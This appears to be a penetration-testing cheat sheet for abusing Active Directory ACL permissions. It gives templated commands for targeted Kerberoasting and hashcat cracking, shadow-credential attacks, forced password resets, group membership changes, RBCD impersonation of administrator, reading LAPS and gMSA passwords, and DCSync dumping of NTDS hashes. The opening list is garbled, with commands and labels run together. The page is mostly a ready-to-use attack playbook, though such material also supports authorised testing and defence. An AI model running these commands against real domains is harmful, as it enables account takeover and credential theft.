Skip to main content

ACL

net
rpc
  • passwordAddMember <TargetUser>
  • <new_password>
  • -UWriteOwner "DOMAIN"/"ControlledUser"%"Password"
  • -S
  • <DomainController>AddKeyCredentialLink
  • bloodyAD
  • --hostReadLAPSPassword <ip>
  • -d
  • <dc>ReadGMSAPassword -u
  • <username>
  • -pDCSync <password>
  • set password <target_userename> <new_password>

    GenericWrite

    targetKerberoasting

    python targetedKerberoast.py -v -d <domain> -u <username> -p <password>
    
    hashcat -m 13100 -a 0 <hash_file> rockyou.txt --force
    

    shadowCredentialsShadowCredentials

    certipy shadow auto -u username@domain -p <password> -account <target_username> -dc-ip <ip>
    

    Using Kerberos

    certipy shadow auto -username username@domain -p <password> -k -account <target_username> -target <dc>
    

    GenericALL

    Password Change

    net rpc password <username> <new_password> -U <domain>/<username>%<hash> -S <dc> --pw-nt-hash
    

    Addmem

    net rpc group addmem <target_group> <username> -U <domain>/<username> -S <dc>
    

    RBCD

    rbcd.py -delegate-from '<machine_name>' -delegate-to '<target>' -dc-ip <ip> -action 'write' '<domain>/<username>:<password>'
    
    getST.py -spn 'cifs/<dc>' -impersonate administrator -dc-ip <ip> '<domain>/<machine_name>:<password>'
    
    export KRB5CCNAME=administrator.ccache
    

    ForceChangePassword

    net rpc password <TargetUser> <new_password> -U <domain>/<ControlledUser>%<Password> -S <DomainController>
    
    net rpc password <username> <new_password> -U <domain>/<username>%<hash> -S <dc> --pw-nt-hash
    
    bloodyAD --host <ip> -d <dc> -u <username> -p <password> set password <target_userename> <new_password>
    
    python rpcchangepwd.py <domain>/<username>:<password>@<ip> -newpass <new_password>
    

    AddMember

    net rpc group addmem <target_group> <username> -U <domain>/<username> -S <dc>
    

    WriteOwner

    owneredit.py -action write -new-owner <username> -target <group_name> <domain>/<username>:<password>
    
    dacledit.py -action 'write' -rights 'WriteMembers' -principal <username> -target-dn <dn> <domain>/<username>:<password>
    
    bloodyAD.py -d <domain> -u <username> -p <password> --host <dc> add groupMember <target_group> <username>
    
    python3 pywhisker.py -d <domain> --dc-ip <ip> -u <username> -H :<hashes> --target <target_username> --action "add"
    
    certipy shadow auto -username <username>@<domain> -hashes :<hashes> -account <target_username>
    

    ReadLAPSPassword

    nxc smb <target> -u <username> -p <password> --laps
    

    ReadGMSAPassword

    nxc ldap <target> -u <username> -p <password> --gmsa
    

    DCSync

    secretsdump.py <dc> -k
    
    nxc smb <domain> -u <username> -p <password> --ntds
    
    nxc smb <domain> -k --use-kcache --ntds
    

    ToolsResources

    bloodyAD

      Adding
    • https://www.thehacker.recipes/ad/movement/dacl/
    • a
    • https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/acl-abuse
    • user

    to a group
    bloodyAD -d <domain> -u <username> -p <password> --host <dc> add groupMember <group_name> <username>
    

    Giving the user GenericAll

    bloodyAD -d <domain> -u <username> -p <password> --host <dc> add genericAll <dn> <username>
    

    Change User Password

    bloodyAD -d <domain> -u <username> -p <password> --host <dc> set password <target_username> <new_password>
    

    powerview.py

    powerview $domain/$username:'$password'@$domain -k
    
    PV > Get-DomainObjectAcl -Identity ServiceMGMT
    

    PowerView

    Find-InterestingDomainACL -ResolveGUIDS | ?{$_.IdentityReferenceName -match "username"}
    

    Or get everything in json format and jq it

    Find-InterestingDomainACL -ResolveGUIDS | ConvertTo-Json
    
    cat acls.json | jq ' .[] | select (.IdentityReferenceName == "username")'
    

    Or

    cat acls.json | jq '.[]' -c | grep -i username | jq .